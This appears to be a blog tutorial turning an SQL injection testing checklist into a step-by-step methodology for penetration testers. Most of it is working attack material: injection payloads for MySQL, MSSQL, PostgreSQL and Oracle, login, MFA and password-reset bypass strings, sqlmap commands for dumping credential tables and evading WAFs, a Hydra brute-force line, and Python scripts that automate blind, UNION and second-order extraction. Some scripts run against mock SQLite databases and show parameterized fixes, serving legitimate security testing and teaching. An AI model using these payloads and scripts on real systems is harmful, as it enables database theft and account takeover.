
Introduction:
SQL Injection (SQLi) remains one of the most prevalent and dangerous web application vulnerabilities, consistently ranking in the OWASP Top 10 despite decades of awareness. Modern web applications are more complex than ever, with attack surfaces expanding beyond traditional form parameters to include JSON payloads, GraphQL arguments, HTTP headers, and WebSocket messages. This comprehensive guide transforms Dharamveer Prasad’s expert SQL injection testing checklist into an actionable, step-by-step methodology for penetration testers, bug bounty hunters, and application security engineers.
Learning Objectives:
- Master systematic input discovery across all modern web application attack surfaces (GET, POST, headers, cookies, APIs)
- Execute and differentiate between five primary SQL injection techniques: Error-Based, Boolean-Based Blind, Time-Based Blind, UNION-Based, and Second-Order
- Implement automated and manual exploitation workflows using industry-standard tools like SQLmap, Burp Suite, and custom scripts
You Should Know:
1. Input Discovery: Mapping the Complete Attack Surface
Before injecting a single payload, you must identify every location where user-controlled data interacts with the backend database. Modern applications expose numerous injection points beyond obvious form fields.
Extended Methodology:
Start by intercepting all HTTP traffic through Burp Suite or OWASP ZAP. Systematically catalog:
- GET Parameters: URL query strings, search filters, sorting/pagination controls, export functions, and hidden parameters
- POST Parameters: Login/registration forms, password reset, contact/update forms, payment processing, and file upload metadata
- HTTP Headers: User-Agent, Referer, X-Forwarded-For, X-Client-IP, Host, and custom authentication headers
- Cookies: Session identifiers, tracking IDs, and preference cookies
- API Endpoints: JSON/XML parameters, GraphQL queries and mutations, multipart form fields, and WebSocket messages
Step-by-Step Implementation:
Linux/macOS (using curl and Burp Suite):
# Intercept and log all parameters from a target endpoint
curl -X GET "https://target.com/api/users?page=1&sort=name&filter=active" \
  -H "User-Agent: Mozilla/5.0" \
  -H "X-Forwarded-For: 127.0.0.1" \
  --cookie "sessionid=abc123" \
  -v
# Hidden-parameter brute force. Filter on the baseline response size (-fs <bytes>) rather than
# on status code: a parameter the backend honours usually changes the page, not the status.
ffuf -u "https://target.com/page?FUZZ=test" -w /usr/share/wordlists/param_names.txt -fc 404
# Enumerate GraphQL endpoints and arguments
graphql-cop -t https://target.com/graphql -e
Windows (PowerShell):
# Basic parameter discovery with Invoke-WebRequest
Invoke-WebRequest -Uri "https://target.com/api/search?q=test" -Method GET -Headers @{"User-Agent"="Mozilla/5.0"}
# Burp Suite Professional: use the Param Miner extension for automated parameter discovery
# Install it from the BApp Store and run its "Guess parameters" functionality
Automation Tip: Use Burp Suite’s Param Miner extension to automatically discover hidden parameters through common naming conventions and brute-force techniques.
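The cataloguing step above, as an added example that is not part of the original checklist: a script that parses a raw HTTP request (the kind you copy out of Burp or ZAP) and lists every candidate injection point in one pass, including nested JSON keys and individual cookies, so nothing is tested by hand and forgotten. The sample request, host name, and field names are constructed for the demo.

```python
import json
from http.cookies import SimpleCookie
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request (not captured from any real target).
SAMPLE_REQUEST = (
    "POST /api/users?page=1&sort=name HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "X-Forwarded-For: 203.0.113.7\r\n"
    "Cookie: sessionid=abc123; theme=dark\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"filter": {"status": "active", "tags": ["vip", "beta"]}, "limit": 25}'
)

# Transport headers that never reach a query; every other header is a candidate.
SKIP_HEADERS = {"content-length", "content-type", "connection", "accept-encoding"}


def parse_raw_request(raw: str):
    """Split a raw request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def _walk_json(node, prefix, out):
    """Flatten nested JSON into dotted paths so every leaf is its own point."""
    if isinstance(node, dict):
        for key, value in node.items():
            _walk_json(value, f"{prefix}.{key}" if prefix else key, out)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk_json(value, f"{prefix}[{i}]", out)
    else:
        out.append(("json", prefix, node))


def injection_points(raw: str):
    """Return (location, name, value) for every user-controlled field."""
    _method, target, headers, body = parse_raw_request(raw)
    points = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        points.append(("query", name, value))
    for name, value in headers.items():
        if name == "cookie":
            jar = SimpleCookie()
            jar.load(value)
            points.extend(("cookie", k, morsel.value) for k, morsel in jar.items())
        elif name not in SKIP_HEADERS:
            points.append(("header", name, value))
    ctype = headers.get("content-type", "")
    if body and ctype.startswith("application/json"):
        _walk_json(json.loads(body), "", points)
    elif body and ctype.startswith("application/x-www-form-urlencoded"):
        points.extend(("form", k, v) for k, v in parse_qsl(body, keep_blank_values=True))
    return points


if __name__ == "__main__":
    for location, name, value in injection_points(SAMPLE_REQUEST):
        print(f"{location:7} {name:20} {value!r}")
```

Each tuple is one request to mutate: the `json` paths tell you exactly which leaf to replace with a payload when you rebuild the body, which is where manual testing of nested APIs usually goes wrong.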
2. Error-Based SQL Injection: The Loudest Vulnerability
Error-based SQL injection is the most straightforward technique to identify and exploit. When you inject malformed SQL syntax, the database returns verbose error messages that reveal critical information about the database structure, version, and even table names.
Step-by-Step Implementation:
Phase 1: Basic Syntax Testing
Start with the bare metacharacters (a lone `'`, `"`, backtick, `--`, `#`) and then the classic probes below. The goal at this stage is only to break the query and provoke an error; note that MySQL treats `--` as a comment only when whitespace follows it, so in a URL use `-- -` or `#`:
' OR '1'='1
' OR 1=1--
' OR 1=1
" OR "1"="1
') OR ('1'='1
Phase 2: Database Fingerprinting
Different databases emit unique error messages. Identify the backend DBMS through crafted payloads:
-- MySQL: any broken quote yields "You have an error in your SQL syntax; check the manual...";
-- to identify the backend, make it echo @@version inside an XPath error
' AND extractvalue(1, concat(0x7e, @@version))-- -
-- MSSQL: "Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...' to data type int."
' AND 1=CONVERT(int, @@VERSION)--
-- PostgreSQL: "ERROR: invalid input syntax for type integer: "PostgreSQL ...""
' AND 1=CAST(version() AS int)--
-- Oracle: "ORA-01722: invalid number" (the value is not echoed; the ORA code alone identifies the DBMS)
' AND 1=TO_NUMBER((SELECT banner FROM v$version WHERE ROWNUM=1))--
Phase 3: Data Extraction Using Errors
Once you identify the DBMS, use error-based techniques to extract data:
-- MySQL: database name via an XPath error (extractvalue echoes at most 32 characters; page through longer values with SUBSTRING)
' AND extractvalue(1, concat(0x7e, database()))-- -
-- MSSQL: first table name via a failed integer conversion
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
-- PostgreSQL: current user via a failed cast
' AND 1=CAST((SELECT current_user) AS int)--
Automated Tools:
Linux (SQLmap):
# Basic error-based detection
sqlmap -u "https://target.com/page?id=1" --batch --level=3
# Extract database names with the error-based technique
sqlmap -u "https://target.com/page?id=1" --dbs --technique=E
# Enumerate tables from a specific database
sqlmap -u "https://target.com/page?id=1" -D database_name --tables --technique=E
Windows (GUI Tools):
- Burp Suite Professional: Use the Scanner’s active scan to automatically detect error-based SQLi
- Havij (legacy): Automated SQL injection tool with error-based exploitation
- SQLMap (Python): cross-platform, run via `python sqlmap.py -u "target" --technique=E`
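Fingerprinting by eye does not scale across hundreds of responses, so here is an added example (written for this page, not from the checklist or any tool it mentions) that does Phases 2 and 3 mechanically: a signature table maps error text to the DBMS, and a second table pulls the leaked value out of the conversion or XPath error that the payloads above provoke. The sample responses are constructed in the shape each DBMS produces; the version strings in them are illustrative.

```python
import re

# Signature table built from the well-known error strings quoted in this section.
DBMS_SIGNATURES = [
    ("MySQL", re.compile(
        r"You have an error in your SQL syntax|XPATH syntax error|"
        r"mysql_fetch_|MariaDB server version", re.I)),
    ("MSSQL", re.compile(
        r"Conversion failed when converting|Unclosed quotation mark|"
        r"Microsoft SQL Server|System\.Data\.SqlClient", re.I)),
    ("PostgreSQL", re.compile(
        r"invalid input syntax for (?:type )?integer|unterminated quoted string|"
        r"PG::SyntaxError|org\.postgresql", re.I)),
    ("Oracle", re.compile(r"\bORA-\d{5}\b|oracle\.jdbc", re.I)),
    ("SQLite", re.compile(r"SQLite3::|sqlite3\.OperationalError|unrecognized token", re.I)),
]

# Where each DBMS echoes the injected expression back inside the error text.
LEAK_PATTERNS = [
    # MySQL extractvalue(1, concat(0x7e, X))  ->  XPATH syntax error: '~X'
    re.compile(r"XPATH syntax error: '~([^']*)'"),
    # MSSQL CONVERT(int, X)  ->  ... converting the nvarchar value 'X' to data type int
    re.compile(r"converting the n?varchar value '([^']*)' to data type int"),
    # PostgreSQL CAST(X AS int)  ->  invalid input syntax for type integer: "X"
    re.compile(r'invalid input syntax for (?:type )?integer: "([^"]*)"'),
]


def fingerprint(body: str):
    """Name the DBMS from an error message, or None if the page shows no DB error."""
    for name, pattern in DBMS_SIGNATURES:
        if pattern.search(body):
            return name
    return None


def leaked_value(body: str):
    """Return the value the DBMS echoed inside its error, or None (e.g. Oracle)."""
    for pattern in LEAK_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None


def triage(body: str) -> dict:
    return {"dbms": fingerprint(body), "leak": leaked_value(body)}


# Constructed responses (not captured from any target) in the shape each DBMS produces.
SAMPLE_RESPONSES = {
    "mysql": "<h1>500</h1> XPATH syntax error: '~5.7.33-0ubuntu0.18.04.1'",
    "mssql": "Conversion failed when converting the nvarchar value "
             "'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5' to data type int.",
    "postgres": 'ERROR:  invalid input syntax for type integer: '
                '"PostgreSQL 14.5 on x86_64-pc-linux-gnu"',
    "oracle": "java.sql.SQLException: ORA-01722: invalid number",
    "clean": "<html><body>Welcome back</body></html>",
}

if __name__ == "__main__":
    for label, body in SAMPLE_RESPONSES.items():
        print(f"{label:9} {triage(body)}")
```

The Oracle case is the caveat worth remembering: TO_NUMBER raises ORA-01722 without quoting the offending value, so on Oracle the error tells you which DBMS you are talking to but extraction has to move to UNION or blind techniques.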
3. Boolean-Based Blind SQL Injection: Silent But Deadly
When error messages are suppressed, boolean-based blind SQL injection becomes your primary technique. You infer database information by observing differences in application responses (content length, status codes, or redirect behavior) when injecting true/false conditions.
Step-by-Step Implementation:
Phase 1: Establish Baseline Responses
Send legitimate requests and record the response characteristics:
Record baseline content length and status code
curl -s -o /dev/null -w "%{http_code} %{size_download}\n" "https://target.com/page?id=1"
Output: 200 4523
Phase 2: Test True/False Conditions
Inject conditions that are always true and always false:
-- Always true (should return the normal content)
' AND 1=1--
-- Always false (should return different content or an error)
' AND 1=2--
Compare response lengths and content. If they differ, the parameter is vulnerable.
Phase 3: Extract Data Character by Character
Use substring functions to extract data one character at a time:
-- MySQL: first character of the database name
' AND SUBSTRING(database(),1,1)='a'-- -
-- PostgreSQL: database() does not exist here; use current_database()
' AND SUBSTRING(current_database(),1,1)='a'--
-- MSSQL: db_name()
' AND SUBSTRING(db_name(),1,1)='a'--
-- Oracle: SUBSTR, and limit v$version to one row or the subquery fails with ORA-01427
' AND SUBSTR((SELECT banner FROM v$version WHERE ROWNUM=1),1,1)='a'--
-- Testing one candidate character at a time costs up to 95 requests per position; compare ASCII codes with > and binary-search instead (about 7 requests per character)
Automation with SQLmap:
# Boolean-based blind detection
sqlmap -u "https://target.com/page?id=1" --technique=B --batch
# Extract database names using the boolean technique
sqlmap -u "https://target.com/page?id=1" --dbs --technique=B --threads=5
# Dump an entire table; --no-cast skips sqlmap's CAST() wrapping, which some backends choke on
sqlmap -u "https://target.com/page?id=1" -D db -T users --dump --technique=B --no-cast
Custom Python Script for Boolean-Based Exploitation:
import requests


def boolean_injection(url, param, payload_true="1=1", payload_false="1=2"):
    """Test boolean-based SQL injection by comparing response lengths.

    A vulnerable parameter returns the baseline page for a true condition and
    a different page for a false one. Values are passed through `params` so
    they are URL-encoded, and the comment is written as `-- -` because MySQL
    only honours `--` when whitespace follows it."""
    session = requests.Session()
    base_length = len(session.get(url, params={param: "1"}, timeout=10).text)

    # Test the true condition: should look like the baseline
    true_payload = f"1' AND {payload_true}-- -"
    true_response = session.get(url, params={param: true_payload}, timeout=10)

    # Test the false condition: should differ from the baseline
    false_payload = f"1' AND {payload_false}-- -"
    false_response = session.get(url, params={param: false_payload}, timeout=10)

    if len(true_response.text) == base_length and len(false_response.text) != base_length:
        print("[+] Boolean-based SQL injection confirmed!")
        return True
    return False


# Example usage
if __name__ == "__main__":
    boolean_injection("https://target.com/page", "id", "1=1", "1=2")
4. Time-Based Blind SQL Injection: Patience Pays Off
When both error messages and visible response differences are absent, time-based blind SQL injection becomes your last resort. You inject database sleep functions and measure response delays to infer boolean conditions.
Step-by-Step Implementation:
Phase 1: Identify Time-Delay Functions
Different databases use different sleep functions:
-- MySQL: SLEEP(seconds) or BENCHMARK()
' AND SLEEP(5)-- -
' AND BENCHMARK(10000000, MD5('test'))-- -
-- MSSQL: WAITFOR DELAY is a separate statement, so it rides on a stacked query
'; WAITFOR DELAY '0:0:5'--
-- PostgreSQL: pg_sleep() returns void and cannot sit directly inside AND; select from it instead
' AND 1=(SELECT 1 FROM pg_sleep(5))--
-- Oracle: DBMS_LOCK.SLEEP is a procedure and cannot be called from a WHERE clause;
-- DBMS_PIPE.RECEIVE_MESSAGE is a function that blocks for the timeout and is executable by PUBLIC
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
Phase 2: Conditional Time Delays
Combine sleep functions with conditional logic to extract data:
-- MySQL: delay only if the first character of the database name is 'a'
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)-- -
-- MSSQL: stacked conditional delay
'; IF (SUBSTRING(db_name(),1,1)='a') WAITFOR DELAY '0:0:5'--
-- PostgreSQL: CASE chooses between a sleeping subquery and a constant
' AND 1=(CASE WHEN (SUBSTRING(current_database(),1,1)='a') THEN (SELECT 1 FROM pg_sleep(5)) ELSE 1 END)--
Phase 3: Automated Detection with SQLmap:
# Time-based blind detection with an explicit delay
sqlmap -u "https://target.com/page?id=1" --technique=T --time-sec=5 --batch
# Extract data using the time-based technique (slower but reliable)
sqlmap -u "https://target.com/page?id=1" --dbs --technique=T --time-sec=10 --threads=1
# Advanced: use tamper scripts to bypass a WAF
sqlmap -u "https://target.com/page?id=1" --technique=T --tamper=space2comment --time-sec=8
Manual Time-Based Testing with cURL:
# Measure the response time of a normal request (-w prints curl's own timer)
curl -s -G "https://target.com/page" --data-urlencode "id=1" -o /dev/null -w "%{time_total}\n"
# Measure the response time of the delayed payload (-G plus --data-urlencode keeps the quote and spaces URL-safe)
curl -s -G "https://target.com/page" --data-urlencode "id=1' AND SLEEP(5)-- -" -o /dev/null -w "%{time_total}\n"
# If the second request takes about 5 seconds longer, and does so on a repeat, the vulnerability is confirmed;
# a single slow response can be network jitter, so always repeat the measurement
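Sections 3 and 4 differ only in the oracle: the inference loop is the same. The added example below (written for this page, not code from the checklist) runs one binary-search extractor against two oracles, a boolean one that compares page content and a timing one that takes the median of several samples so jitter does not flip a bit, and then shows the same extractor coming back empty against a parameterized version of the page. An in-memory SQLite database stands in for the target, with a SLEEP() function registered on a fake clock so the timing run completes instantly; the table, rows, and the `target.example` page shape are constructed for the demo.

```python
import random
import sqlite3
import statistics


class FakeClock:
    """Stands in for time.perf_counter()/SLEEP so the timing oracle runs instantly."""
    def __init__(self):
        self.t = 0.0
    def now(self):
        return self.t
    def sleep(self, seconds):
        self.t += seconds


CLOCK = FakeClock()
RNG = random.Random(7)  # deterministic "network jitter"

# Constructed vulnerable backend (SQLite in memory stands in for the DBMS).
CON = sqlite3.connect(":memory:")
CON.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
CON.executemany("INSERT INTO users VALUES (?, ?, ?)",
                [(1, "admin", "s3cr3t"), (2, "bob", "hunter2")])
# Give SQLite a SLEEP() like MySQL's; it advances the fake clock instead of blocking.
CON.create_function("SLEEP", 1, lambda s: CLOCK.sleep(s) or 0)


def vulnerable_page(user_id: str) -> str:
    """The bug: input is concatenated into the query. Errors are hidden (blind only)."""
    CLOCK.sleep(RNG.uniform(0.05, 0.9))  # request/response jitter on every call
    try:
        rows = CON.execute(
            f"SELECT username FROM users WHERE id = '{user_id}'").fetchall()
    except sqlite3.Error:
        return "<p>Something went wrong</p>"
    return f"<p>Welcome, {rows[0][0]}</p>" if rows else "<p>No such user</p>"


def fixed_page(user_id: str) -> str:
    """Same page with a bound parameter: the input can never change the query."""
    rows = CON.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchall()
    return f"<p>Welcome, {rows[0][0]}</p>" if rows else "<p>No such user</p>"


def boolean_oracle(page, condition: str) -> bool:
    """True when injecting `condition` leaves the page identical to the baseline."""
    return page(f"1' AND ({condition})-- ") == page("1")


def timing_oracle(page, condition: str, delay=5, samples=3) -> bool:
    """True when the median of several timed requests shows the injected delay."""
    payload = f"1' AND (CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END)-- "
    durations = []
    for _ in range(samples):
        start = CLOCK.now()
        page(payload)
        durations.append(CLOCK.now() - start)
    return statistics.median(durations) >= delay / 2


def extract(oracle, expr: str, max_len=64) -> str:
    """Binary-search each character's code point: about 7 oracle calls per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite spells these unicode()/substr(); MySQL would use ascii()/substring().
            if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: unicode('') is NULL, never > mid
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE username='admin'"
    print("boolean:", extract(lambda c: boolean_oracle(vulnerable_page, c), secret))
    print("timing: ", extract(lambda c: timing_oracle(vulnerable_page, c), secret))
    print("fixed:  ", repr(extract(lambda c: boolean_oracle(fixed_page, c), secret)))
```

On a real target, replace `CLOCK.now()` with `time.perf_counter()` and `page()` with the HTTP request; the `delay / 2` threshold and the median over three samples are what keep a single slow response from being mistaken for a true bit.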
5. UNION-Based SQL Injection: The Data Exfiltration King
UNION-based SQL injection allows you to combine the results of your injected query with the original query, directly extracting database contents.
Step-by-Step Implementation:
Phase 1: Determine Number of Columns
Use `ORDER BY` or `UNION SELECT NULL` to enumerate columns:
-- Method 1: ORDER BY (increment until an error)
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
-- An error at ORDER BY 4 means 3 columns exist
-- Method 2: UNION SELECT NULL (increment the NULLs)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- Success with 3 NULLs means 3 columns exist
Phase 2: Identify Displayed Columns
Replace NULLs with values to see which columns are rendered:
' UNION SELECT 'test',NULL,NULL--
' UNION SELECT NULL,'test',NULL--
' UNION SELECT NULL,NULL,'test'--
-- The column in which 'test' appears is rendered in the response
Phase 3: Extract Database Information
Once you identify displayable columns, extract data:
-- Database version (@@version on MySQL and MSSQL; version() on PostgreSQL; banner FROM v$version on Oracle)
' UNION SELECT @@version,NULL,NULL--
-- Current database name (MySQL)
' UNION SELECT database(),NULL,NULL--
-- Table names (MySQL, MSSQL and PostgreSQL expose information_schema; Oracle uses all_tables)
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
-- Column names of a chosen table
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
-- Dump credentials (both values must land in columns that are displayed and string-compatible)
' UNION SELECT username,password,NULL FROM users--
-- Caveat: MSSQL and Oracle reject a UNION whose column types do not match, so keep NULL in any slot
-- whose type is unknown, and Oracle needs FROM dual on a SELECT that names no table
Automated Exploitation with SQLmap:
# UNION-based detection and exploitation
sqlmap -u "https://target.com/page?id=1" --technique=U --batch
# Enumerate columns and dump data
sqlmap -u "https://target.com/page?id=1" -D db -T users --columns --dump --technique=U
# Use --union-cols to pin the column count and --union-char to pick the probe value
sqlmap -u "https://target.com/page?id=1" --union-cols=3 --union-char=test --technique=U
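The three UNION phases automated end to end, as an added example that is not part of the checklist: it counts columns with ORDER BY, finds which slots are rendered by planting a unique marker in each, then packs a tagged expression into a rendered slot and parses the rows back out. The target is a constructed SQLite search page that selects three columns but renders only two, a common shape that catches people who assume every selected column is visible. Table names, rows, and markup are made up for the demo.

```python
import re
import sqlite3

# Constructed vulnerable search page: three columns selected, only two rendered.
CON = sqlite3.connect(":memory:")
CON.executescript("""
CREATE TABLE products(name TEXT, price REAL, description TEXT);
INSERT INTO products VALUES ('Widget', 9.99, 'A widget'), ('Gadget', 19.99, 'A gadget');
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cr3t'), ('bob', 'hunter2');
""")


def search_page(q: str) -> str:
    """The bug: `q` is concatenated into the query. The description column is never shown."""
    try:
        rows = CON.execute(
            f"SELECT name, price, description FROM products WHERE name LIKE '%{q}%'").fetchall()
    except sqlite3.Error:
        return "<p>error</p>"
    return "".join(f"<tr><td>{name}</td><td>{price}</td></tr>" for name, price, _ in rows)


def column_count(page, max_cols=20) -> int:
    """Phase 1: ORDER BY n errors as soon as n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        if page(f"' ORDER BY {n}-- ") == "<p>error</p>":
            return n - 1
    raise RuntimeError("column count not found")


def reflected_columns(page, ncols: int) -> list:
    """Phase 2: put a unique marker in each slot and record which ones reach the HTML."""
    reflected = []
    for i in range(ncols):
        marker = f"mrk{i}z"
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        if marker in page(f"' UNION SELECT {','.join(cols)}-- "):
            reflected.append(i + 1)  # 1-based, matching ORDER BY numbering
    return reflected


def dump(page, ncols: int, slot: int, expr: str, table: str) -> list:
    """Phase 3: tag the target expression, place it in a rendered slot, parse it back."""
    cols = ["NULL"] * ncols
    cols[slot - 1] = f"'SQLi:' || ({expr})"  # || is SQLite/PostgreSQL/Oracle; MySQL uses CONCAT()
    html = page(f"' UNION SELECT {','.join(cols)} FROM {table}-- ")
    return re.findall(r"SQLi:([^<]*)", html)


if __name__ == "__main__":
    n = column_count(search_page)
    shown = reflected_columns(search_page, n)
    print(f"{n} columns, rendered slots: {shown}")
    print(dump(search_page, n, shown[0], "username || ':' || password", "users"))
```

The tag prefix is what makes the parsing robust: with a plain `UNION SELECT username,...` you would have to tell product rows from user rows by eye, whereas `SQLi:` lets a regex pick out exactly the injected rows regardless of how the page lays them out.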
6. Authentication Bypass via SQL Injection
Authentication bypass is one of the most critical SQL injection vectors, allowing attackers to gain unauthorized access without valid credentials.
Step-by-Step Implementation:
Phase 1: Basic Login Bypass Payloads
-- Classic OR injection (username field)
username: admin' OR '1'='1
password: anything
-- Comment out the password check
username: admin'--
password: anything
-- UNION-based bypass: supply the row the application will accept
username: ' UNION SELECT 1,'admin','password'--
password: anything
-- Always-true condition in either field
username: ' OR 1=1--
password: ' OR 1=1--
Phase 2: Advanced Bypass Techniques
-- Stacked queries (MSSQL, PostgreSQL): a second statement runs after the login query. Prove it with a
-- harmless delay; never run a destructive statement such as DROP TABLE against a target you are assessing
username: admin'; WAITFOR DELAY '0:0:5'--
password: anything
-- Inline comments in place of spaces (useful against WAF rules that key on whitespace)
username: admin'/**/OR/**/1=1--
password: anything
-- CASE expression instead of a bare OR
username: ' OR CASE WHEN 1=1 THEN 1 ELSE 0 END--
password: anything
Phase 3: MFA and Password Reset Bypass
-- MFA verification: the code lookup itself is injectable
mfa_code: ' OR 1=1--
-- Password reset: pull another user's token through the token lookup (admin_token is a placeholder column name)
token: ' UNION SELECT admin_token FROM users WHERE '1'='1
-- Account verification
verification_code: ' OR 1=1--
Automated Tools:
# Hydra can spray payloads through http-post-form. With rockyou.txt this is a plain password brute force;
# to test injection, point -L or -P at a file of bypass payloads instead of a password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# AuthBypass (third-party script referenced by the checklist)
git clone https://github.com/0xgh057r3c0n/AuthBypass
python authbypass.py -u https://target.com/login -f username -p password
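Why some of the payloads above work on one login and not another comes down to where the password is checked. This added example (written for this page, not from the checklist) builds three versions of a login against a constructed SQLite user table: one that checks the hash inside the SQL, one that checks it in application code, and a parameterized one. The `OR 1=1` family only defeats the first; the UNION payload defeats the second as well because it lets the attacker supply the hash the application will compare against. The table, user, and passphrase are made up for the demo.

```python
import hashlib
import hmac
import sqlite3


def h(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user store (not from any real application).
CON = sqlite3.connect(":memory:")
CON.execute("CREATE TABLE users(username TEXT, pw_hash TEXT)")
CON.execute("INSERT INTO users VALUES ('admin', ?)", (h("correct horse battery staple"),))


def login_v1(username: str, password: str):
    """Worst case: both fields concatenated and the password checked inside the SQL."""
    row = CON.execute(
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND pw_hash = '{h(password)}'").fetchone()
    return row[0] if row else None


def login_v2(username: str, password: str):
    """Password compared in application code. OR 1=1 now returns admin's real hash,
    which the attacker cannot match; UNION lets them return a hash of their choosing."""
    row = CON.execute(
        f"SELECT username, pw_hash FROM users WHERE username = '{username}'").fetchone()
    if row and row[1] == h(password):
        return row[0]
    return None


def login_fixed(username: str, password: str):
    """Bound parameter plus constant-time comparison: the input is only ever data."""
    row = CON.execute(
        "SELECT username, pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row and hmac.compare_digest(row[1], h(password)):
        return row[0]
    return None


def union_payload(password: str) -> str:
    """Username that makes the query return ('admin', hash of a password we know)."""
    return f"' UNION SELECT 'admin', '{h(password)}'-- "


if __name__ == "__main__":
    for name, login in [("v1", login_v1), ("v2", login_v2), ("fixed", login_fixed)]:
        print(name, "comment-out:", login("admin'-- ", "x"),
              "| or-1=1:", login("' OR 1=1-- ", "x"),
              "| union:", login(union_payload("x"), "x"))
```

The takeaway for testing: when `admin'--` fails on a login that you are otherwise sure is injectable, do not conclude it is safe; the password is probably verified after the query, and a UNION that returns a chosen hash is the next payload to try.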
7. Second-Order SQL Injection: The Sleeping Giant
Second-order SQL injection occurs when malicious payloads are stored in the database by one application function and later executed by a different function without proper sanitization. This is particularly dangerous because input validation may pass initial checks but fail during subsequent processing.
Step-by-Step Implementation:
Phase 1: Identify Stored Input Vectors
Look for user-controllable data that gets stored and later used in SQL queries:
- User registration: username, email, full name
- Profile updates: bio, company name, shipping address
- Order processing: product reviews, notes fields
- Admin functions: audit logs, system notes
Phase 2: Inject Sleeping Payloads
Inject time-delay payloads into stored fields:
-- Register with a payload that is harmless on insert but active once the stored value is reused
username: test' OR SLEEP(5)-- -
email: [email protected]
-- Then trigger a function that queries by username: view profile, search users, generate a report
-- A response delayed by about 5 seconds at that second step means the stored value reached a query unescaped
Phase 3: Extract Data Through Stored Procedures
-- Step 1: store the payload in a profile field (its column count must match the query that later reads it)
Bio: ' UNION SELECT username,password FROM users WHERE '1'='1
-- Step 2: trigger the later query that concatenates the stored bio (a report, an export, an admin view)
-- The UNION executes inside that second query and the credentials appear in its output
Detection with SQLmap (Second-Order):
# --second-order: the URL whose response reflects the stored payload
sqlmap -u "https://target.com/register" --data="username=test&[email protected]" \
  --second-order="https://target.com/profile" --technique=T --batch
# --second-req: a saved HTTP request file for the step that triggers execution
sqlmap -u "https://target.com/register" --second-req=second_order.txt --batch
Burp Suite Configuration:
1. Intruder: send payloads to the stored input fields
2. Sequencer: analyze session tokens after payload injection
3. Repeater: manually test stored payloads by triggering the different application functions that read them
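The mechanics of a second-order injection, as an added example that is not part of the checklist: registration is done correctly with a bound parameter, so the crafted username is stored as plain data, but a later password-change routine trusts the stored value and concatenates it into an UPDATE. Registering as `admin'-- ` therefore changes admin's password rather than the attacker's own. A constructed SQLite table stands in for the application's user store; the parameterized `change_password_fixed` shows the repair.

```python
import sqlite3

# Constructed user store (not from any real application).
CON = sqlite3.connect(":memory:")
CON.execute("CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT)")
CON.execute("INSERT INTO users VALUES ('admin', 'admin-original')")


def register(username: str, password: str) -> None:
    """First-order safe: bound parameters, so the quote in the name is just data."""
    CON.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password(username: str, new_password: str) -> int:
    """Second-order bug: the username comes from the database (via the session),
    is assumed trustworthy, and is concatenated. Returns rows updated."""
    cur = CON.execute(
        f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'")
    return cur.rowcount


def change_password_fixed(username: str, new_password: str) -> int:
    """Stored or not, the value is bound, so it can only ever match its own row."""
    cur = CON.execute(
        "UPDATE users SET password = ? WHERE username = ?", (new_password, username))
    return cur.rowcount


def password_of(username: str) -> str:
    return CON.execute(
        "SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]


def attack() -> int:
    """Register a crafted name, then trigger the function that reuses it."""
    evil = "admin'-- "
    register(evil, "whatever")
    # The app later loads `evil` back from the session and builds:
    #   UPDATE users SET password = 'pwned' WHERE username = 'admin'-- '
    return change_password(evil, "pwned")


if __name__ == "__main__":
    print("rows updated:", attack())
    print("admin password now:", password_of("admin"))
    print("attacker row:", password_of("admin'-- "))
```

When hunting for this, the registration response tells you nothing; the signal only appears at the second step, which is why the checklist has you trigger every function that reads the stored field.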
What Undercode Say:
- Key Takeaway 1: SQL injection remains the most critical web application vulnerability because it directly compromises the database layer, the heart of modern applications. The checklist approach transforms chaotic testing into a systematic, repeatable methodology that covers every possible attack surface.
- Key Takeaway 2: Modern web applications demand modern testing approaches. Beyond traditional form parameters, security professionals must probe JSON APIs, GraphQL endpoints, WebSocket messages, and HTTP headers. The attack surface has expanded exponentially, and your testing methodology must evolve accordingly.
